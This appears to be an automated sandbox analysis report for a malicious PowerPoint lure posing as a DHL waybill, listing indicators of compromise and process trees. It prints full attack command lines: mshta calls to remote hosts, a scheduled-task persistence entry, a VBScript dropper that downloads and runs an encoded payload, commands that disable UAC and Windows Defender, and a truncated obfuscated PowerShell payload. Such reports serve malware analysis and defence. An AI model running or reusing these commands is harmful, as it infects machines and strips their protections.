1996	powershell.exe
1996	powershell.exe
1104	powershell.exe
1608	powershell.exe
1104	powershell.exe
1608	powershell.exe
1172	powershell.exe
1172	powershell.exe
2132	powershell.exe
2132	powershell.exe
2260	powershell.exe
2260	powershell.exe
2392	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
2392	powershell.exe
2628	powershell.exe
2628	powershell.exe
2800	powershell.exe
2656	aspnet_compiler.exe
2656	aspnet_compiler.exe
2800	powershell.exe
2980	powershell.exe
2980	powershell.exe
2084	powershell.exe
2084	powershell.exe
2356	powershell.exe
2356	powershell.exe
960	powershell.exe
960	powershell.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1996	powershell.exe
Token: SeSecurityPrivilege	1996	powershell.exe
Token: SeTakeOwnershipPrivilege	1996	powershell.exe
Token: SeLoadDriverPrivilege	1996	powershell.exe
Token: SeSystemProfilePrivilege	1996	powershell.exe
Token: SeSystemtimePrivilege	1996	powershell.exe
Token: SeProfSingleProcessPrivilege	1996	powershell.exe
Token: SeIncBasePriorityPrivilege	1996	powershell.exe
Token: SeCreatePagefilePrivilege	1996	powershell.exe
Token: SeBackupPrivilege	1996	powershell.exe
Token: SeRestorePrivilege	1996	powershell.exe
Token: SeShutdownPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeSystemEnvironmentPrivilege	1996	powershell.exe
Token: SeRemoteShutdownPrivilege	1996	powershell.exe
Token: SeUndockPrivilege	1996	powershell.exe
Token: SeManageVolumePrivilege	1996	powershell.exe
Token: 33	1996	powershell.exe
Token: 34	1996	powershell.exe
Token: 35	1996	powershell.exe
Token: SeIncreaseQuotaPrivilege	1996	powershell.exe
Token: SeSecurityPrivilege	1996	powershell.exe
Token: SeTakeOwnershipPrivilege	1996	powershell.exe
Token: SeLoadDriverPrivilege	1996	powershell.exe
Token: SeSystemProfilePrivilege	1996	powershell.exe
Token: SeSystemtimePrivilege	1996	powershell.exe
Token: SeProfSingleProcessPrivilege	1996	powershell.exe
Token: SeIncBasePriorityPrivilege	1996	powershell.exe
Token: SeCreatePagefilePrivilege	1996	powershell.exe
Token: SeBackupPrivilege	1996	powershell.exe
Token: SeRestorePrivilege	1996	powershell.exe
Token: SeShutdownPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeSystemEnvironmentPrivilege	1996	powershell.exe
Token: SeRemoteShutdownPrivilege	1996	powershell.exe
Token: SeUndockPrivilege	1996	powershell.exe
Token: SeManageVolumePrivilege	1996	powershell.exe
Token: 33	1996	powershell.exe
Token: 34	1996	powershell.exe
Token: 35	1996	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2656	aspnet_compiler.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

2656 aspnet_compiler.exe

pid	process
2656	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

POWERPNT.EXEmshta.execmd.exeWScript.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1100 wrote to memory of 1148	1100	POWERPNT.EXE	splwow64.exe
PID 1100 wrote to memory of 1148	1100	POWERPNT.EXE	splwow64.exe
PID 1100 wrote to memory of 1148	1100	POWERPNT.EXE	splwow64.exe
PID 1100 wrote to memory of 1148	1100	POWERPNT.EXE	splwow64.exe
PID 1100 wrote to memory of 900	1100	POWERPNT.EXE	mshta.exe
PID 1100 wrote to memory of 900	1100	POWERPNT.EXE	mshta.exe
PID 1100 wrote to memory of 900	1100	POWERPNT.EXE	mshta.exe
PID 1100 wrote to memory of 900	1100	POWERPNT.EXE	mshta.exe
PID 900 wrote to memory of 1580	900	mshta.exe	schtasks.exe
PID 900 wrote to memory of 1580	900	mshta.exe	schtasks.exe
PID 900 wrote to memory of 1580	900	mshta.exe	schtasks.exe
PID 900 wrote to memory of 1580	900	mshta.exe	schtasks.exe
PID 900 wrote to memory of 1384	900	mshta.exe	cmd.exe
PID 900 wrote to memory of 1384	900	mshta.exe	cmd.exe
PID 900 wrote to memory of 1384	900	mshta.exe	cmd.exe
PID 900 wrote to memory of 1384	900	mshta.exe	cmd.exe
PID 1384 wrote to memory of 1096	1384	cmd.exe	WScript.exe
PID 1384 wrote to memory of 1096	1384	cmd.exe	WScript.exe
PID 1384 wrote to memory of 1096	1384	cmd.exe	WScript.exe
PID 1384 wrote to memory of 1096	1384	cmd.exe	WScript.exe
PID 1096 wrote to memory of 284	1096	WScript.exe	WScript.exe
PID 1096 wrote to memory of 284	1096	WScript.exe	WScript.exe
PID 1096 wrote to memory of 284	1096	WScript.exe	WScript.exe
PID 1096 wrote to memory of 284	1096	WScript.exe	WScript.exe
PID 284 wrote to memory of 896	284	WScript.exe	WScript.exe
PID 284 wrote to memory of 896	284	WScript.exe	WScript.exe
PID 284 wrote to memory of 896	284	WScript.exe	WScript.exe
PID 284 wrote to memory of 896	284	WScript.exe	WScript.exe
PID 1996 wrote to memory of 2596	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2596	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2596	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2596	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2612	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2612	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2612	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2612	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2620	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2620	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2620	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2620	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2636	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2636	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2636	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2636	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe
PID 1996 wrote to memory of 2656	1996	powershell.exe	aspnet_compiler.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL#AWB031121.ppt"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1148

C:\Windows\SysWOW64\mshta.exe
mshta http://j.mp/djksahdjsahdhdkghdagjcsadnas
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/ice222222.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:1580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
3⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
4⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:284

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\SysWOW64\WScript.exe" "C:\Users\Public\bin.vbs" /elevate
6⤵
- Checks whether UAC is enabled
- System policy modification
PID:896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noexit ((gp HKCU:\Software).cutona)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
PID:2596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
PID:2612

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
PID:2636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
2⤵
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SubmitSamplesConsent 2
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -MAPSReporting 0
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**47**$**56**$**35**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**37**$**c6**$**16**$**66**$**42**$**a3**$**d6**$**27**$**96**$**66**$**e6**$**f6**$**34**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**07**$**f6**$**47**$**35**$**a0**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**f6**$**47**$**02**$**47**$**96**$**02**$**47**$**56**$**37**$**02**$**46**$**e6**$**16**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**37**$**02**$**56**$**86**$**47**$**02**$**07**$**f6**$**47**$**37**$**02**$**32**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**46**$**27**$**f6**$**75**$**44**$**02**$**56**$**07**$**97**$**45**$**d2**$**02**$**13**$**02**$**56**$**57**$**c6**$**16**$**65**$**d2**$**02**$**22**$**56**$**27**$**16**$**77**$**97**$**07**$**35**$**96**$**47**$**e6**$**14**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**22**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**97**$**47**$**27**$**56**$**07**$**f6**$**27**$**05**$**d6**$**56**$**47**$**94**$**d2**$**47**$**56**$**35**$**a0**$**d7**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**d6**$**56**$**47**$**94**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**d6**$**56**$**47**$**94**$**d2**$**77**$**56**$**e4**$**02**$**02**$**02**$**02**$**a0**$**b7**$**02**$**92**$**92**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**86**$**47**$**16**$**05**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**47**$**37**$**56**$**45**$**82**$**12**$**82**$**02**$**66**$**96**$**a0**$**22**$**27**$**56**$**46**$**e6**$**56**$**66**$**56**$**44**$**02**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**56**$**96**$**36**$**96**$**c6**$**f6**$**05**$**c5**$**54**$**25**$**14**$**75**$**45**$**64**$**f4**$**35**$**c5**$**a3**$**d4**$**c4**$**b4**$**84**$**22**$**02**$**d3**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**a0**$**a0**$**46**$**e6**$**56**$**35**$**27**$**56**$**67**$**56**$**e4**$**02**$**47**$**e6**$**56**$**37**$**e6**$**f6**$**34**$**37**$**56**$**c6**$**07**$**d6**$**16**$**35**$**47**$**96**$**d6**$**26**$**57**$**35**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**76**$**e6**$**96**$**47**$**27**$**f6**$**07**$**56**$**25**$**35**$**05**$**14**$**d4**$**d2**$**02**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**46**$**f6**$**d4**$**47**$**96**$**46**$**57**$**14**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**b6**$**27**$**f6**$**77**$**47**$**56**$**e4**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**37**$**37**$**56**$**36**$**36**$**14**$**27**$**56**$**46**$**c6**$**f6**$**64**$**46**$**56**$**c6**$**c6**$**f6**$**27**$**47**$**e6**$**f6**$**34**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**e6**$**e6**$**16**$**36**$**35**$**47**$**07**$**96**$**27**$**36**$**35**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**27**$**f6**$**47**$**96**$**e6**$**f6**$**d4**$**56**$**d6**$**96**$**47**$**c6**$**16**$**56**$**25**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**65**$**14**$**f4**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**d6**$**56**$**47**$**37**$**97**$**35**$**e6**$**f6**$**96**$**47**$**e6**$**56**$**67**$**56**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**27**$**47**$**e6**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**35**$**a0**$**a0**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**74**$**02**$**d3**$**02**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**a0**$**22**$**a3**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**27**$**57**$**f6**$**95**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**22**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**86**$**47**$**16**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**02**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**a0**$**a0**$**a0**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**37**$**f6**$**86**$**e6**$**f6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**16**$**47**$**86**$**37**$**d6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**c6**$**56**$**86**$**37**$**27**$**56**$**77**$**f6**$**07**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**c6**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**a6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**96**$**47**$**55**$**c6**$**c6**$**16**$**47**$**37**$**e6**$**94**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**d6**$**37**$**16**$**c6**$**96**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**